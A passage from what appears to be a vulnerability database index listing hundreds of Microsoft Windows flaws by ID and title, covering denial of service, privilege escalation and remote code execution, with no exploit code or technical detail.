Unspecified Remote DoS [66974] Microsoft Windows SMB Server SMB_COM_TRANSACTION2 Request Handling Remote Code Execution [66934] Microsoft Windows win32k.sys CreateDIBPalette() Function Local Overflow [66387] Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution [66003] Microsoft Windows win32k.sys NtUserCheckAccessForIntegrityLevel Use-After-Free Local Privilege Escalation [66001] Microsoft Windows mshtml.dll CTimeoutEventList::InsertIntoTimeoutList Local Pointer Disclosure [65529] Microsoft Windows Help and Support Center sysinfo/sysinfomain.htm svr Parameter XSS [65264] Microsoft Windows hcp:// Protocol Handler MPC::HexToNum() Function String Miscalculation Arbitrary Command Execution [65225] Microsoft Windows Kernel-Mode Driver Window Creation Local Privilege Escalation [65224] Microsoft Windows Kernel-Mode Driver Win32k.sys GetDCEx() Function Device Contexts (DC) Handling Local Privilege Escalation [65223] Microsoft Windows Kernel-Mode Driver TrueType Font Parsing Local Privilege Escalation [65222] Microsoft Windows MJPEG Media Decompression Unspecified Remote Code Execution [65221] Microsoft Windows Media Decompression Unspecified Remote Code Execution [65219] Microsoft Windows / Office COM Object Instantiation Validation Remote Code Execution [65217] Microsoft Windows OpenType Compact Font Format (CFF) Driver Privilege Escalation [64928] Microsoft Windows SMB Client Transaction Response Handling Memory Corruption (2010-0476) [64927] Microsoft Windows SMB Client Transaction SMB_COM_TRANSACTION2 Response Handling Memory Corruption [64926] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0477) [64925] Microsoft Windows SMB Client Unspecified Response Handling Memory Corruption (2010-0269) [64731] Microsoft Windows Canonical Display Driver (cdd.dll) Unspecified Memory Corruption [64530] Microsoft Outlook Express / Windows Mail STAT Response Overflow [64391] Microsoft Windows Group Policy Management Editor Account Password Removal Weakness [64341] Microsoft Windows Unspecified SMB Negotiation Remote DoS [64340] Microsoft Windows RRAS InterfaceAdjustVLSPointers Null Dereference Remote DoS [64058] Microsoft Windows win32k.sys SfnINSTRING() Local DoS [64057] Microsoft Windows win32k.sys Driver SfnLOGONNOTIFY() Function Local Privilege Escalation [63765] Microsoft Windows Media Player ActiveX fourCC Compression Code Codec Retrieval Arbitrary Code Execution [63749] Microsoft Windows MPEG Layer-3 Audio Decoder AVI File Handling Overflow [63747] Microsoft Windows ISATAP Component IPv6 Tunneled Packet IP Address Spoofing Weakness [63746] Microsoft Windows Authenticode Signature Verification Cabview Manipulation Privilege Escalation [63745] Microsoft Windows Authenticode WinVerifyTrust Signature Manipulation Validation Bypass [63739] Microsoft Windows SMTP / Exchange Server Malformed Command Sequence Remote Information Disclosure [63738] Microsoft Windows SMTP / Exchange Server DNS Mail Exchanger (MX) Resource Record Handling Remote DoS [63736] Microsoft Windows Kernel Symbolic Link Value Processing Unspecified Local DoS [63735] Microsoft Windows Kernel Exception Handling Unspecified Local DoS [63733] Microsoft Windows Kernel Registry Link Symbolic Link Extraction Local Privilege Escalation [63732] Microsoft Windows Kernel Malformed Image Handling Local DoS [63731] Microsoft Windows Kernel Registry Hive Symbolic Link Creation Local Privilege Escalation [63730] Microsoft Windows Kernel Registry Key Validation Unspecified Local DoS [63729] Microsoft Windows Kernel Virtual Path Parsing Local DoS [63728] Microsoft Windows Unspecified Kernel System Call Registry Handling Local DoS [63726] Microsoft Windows Media Unicast Service Transport Packet Handling Remote Overflow [63468] Microsoft Windows ANI Parser BITMAPINFO Header Crafted biClrUsed Value DoS [63231] Microsoft Windows Media Player Crafted AVI File Colorspace Conversion Memory Corruption [62855] Microsoft Windows HTML Help Control ActiveX chm File Handling Arbitrary Code Execution [62811] Microsoft Windows Movie Maker / Producer IsValidWMToolsStream() Function Project File (.MSWMM) Handling Overflow [62756] Microsoft Windows VBScript MsgBox() Function helpfile Argument Arbitrary Command Execution [62660] Microsoft Windows Unspecified API Argument Validation Local DoS [62652] Microsoft Windows Media Player Crafted MPG File Handling Overflow DoS [62637] Microsoft Windows Malformed TCP SYN Packet Remote DoS (Blat) [62632] Microsoft Windows VBScript MsgBox() Function HLP File Arbitrary Command Execution [62259] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [62258] Microsoft Windows Kerberos Ticket-Granting-Ticket Renewal Request NULL Dereference Remote DoS [62257] Microsoft Windows DirectShow AVI File Decompression Overflow [62256] Microsoft Windows SMB Server Crafted Network Message Remote Code Execution [62255] Microsoft Windows SMB Server Crafted Packet Handling Remote DoS [62254] Microsoft Windows SMB Server Crafted Packet Handling NULL Dereference Remote DoS [62253] Microsoft Windows SMB Server NTLM Authentication Nonce Entropy Weakness [62252] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Session Termination Weakness Local Privilege Escalation [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [62250] Microsoft Windows TCP/IP Stack ICMPv6 Router Advertisement Packet Handling Remote Code Execution [62249] Microsoft Windows TCP/IP Stack ESP Over UDP Header MDL Fragmentation Remote Code Execution [62248] Microsoft Windows TCP/IP Stack ICMPv6 Route Information Packet Handling Remote Code Execution [62247] Microsoft Windows TCP/IP Selective Acknowledgment (SACK) Value Handling Remote DoS [62245] Microsoft Windows Shell Handler ShellExecute API Crafted URL Arbitrary Command Execution [62244] Microsoft Windows SMB Client Negotiate Protocol Response Handling Remote Code Execution [62243] Microsoft Windows SMB Client Packet Handling Race Condition Remote Privilege Escalation [62242] Microsoft Windows Paint JPEG Image Decoding Overflow [61854] Microsoft Windows Virtual DOS Machine (VDM) Subsystem #GP Trap Handler (nt!KiTrap0D) Local Privilege Escalation [61676] Microsoft Windows Live Messenger msnmsgr.exe ActiveX (msgsc.14.0.8089.726.dll) ViewProfile Method MSN Messenger Session Remote DoS [61651] Microsoft Windows Embedded OpenType Font Engine LZCOMP Decompressor Font Handling Arbitrary Code Execution [61037] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4312) [61036] Microsoft Windows Indeo Codec Crafted Media Content Arbitrary Code Execution (2009-4311) [60858] Microsoft Windows Intel Indeo32 Codec (ir32_32.dll) IV32 FourCC Code Handling Heap Corruption [60857] Microsoft Windows Indeo Codec Unspecified Memory Corruption [60856] Microsoft Windows Intel Indeo41 Codec IV41 Stream Video Decompression Overflow [60855] Microsoft Windows Intel Indeo41 Codec IV41 movi Record Handling Overflow [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [60833] Microsoft Windows Internet Authentication Service Crafted MS-CHAP v2 Message Remote Authentication Bypass [60832] Microsoft Windows Internet Authentication Service Protected Extensible Authentication Protocol (PEAP) Message Handling Remote Memory Corruption [60831] Microsoft Windows Local Security Authority Subsystem (LSASS) ISAKMP Message Handling Resource Exhaustion Remote DoS [60368] Microsoft Windows Terminal Services msgina.dll Unrestricted Resource Lock Remote DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [60273] Microsoft Windows NT Virtual DOS Machine 16-bit Executable Permission Bypass Local Privilege Escalation [60225] Microsoft Windows XP System Restore Directory ACL Weakness Local Privilege Escalation [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [60206] Microsoft Windows Fast User Switching (FUS) Arbitrary User Process Listing Disclosure [60145] Microsoft Windows NT cmd.exe CD Command Arbitrary Local Code Execution [60057] Microsoft Windows File Protection (WFP) Catalog File (.CAT) Modification Hash Code Comparison Bypass [59957] Microsoft Windows SMB Response Handling Remote DoS [59869] Microsoft Windows Win32k Table of Directory Entry Building Font Code Parsing Remote Code Execution [59868] Microsoft Windows Win32k GDI Kernel Component Unspecified Local Privilege Escalation [59867] Microsoft Windows Win32k Unspecified Kernel System Call Local Privilege Escalation [59865] Microsoft Windows Web Services on Devices API (WSDAPI) Message Header Handling Memory Corruption [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [59738] Microsoft Windows ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] 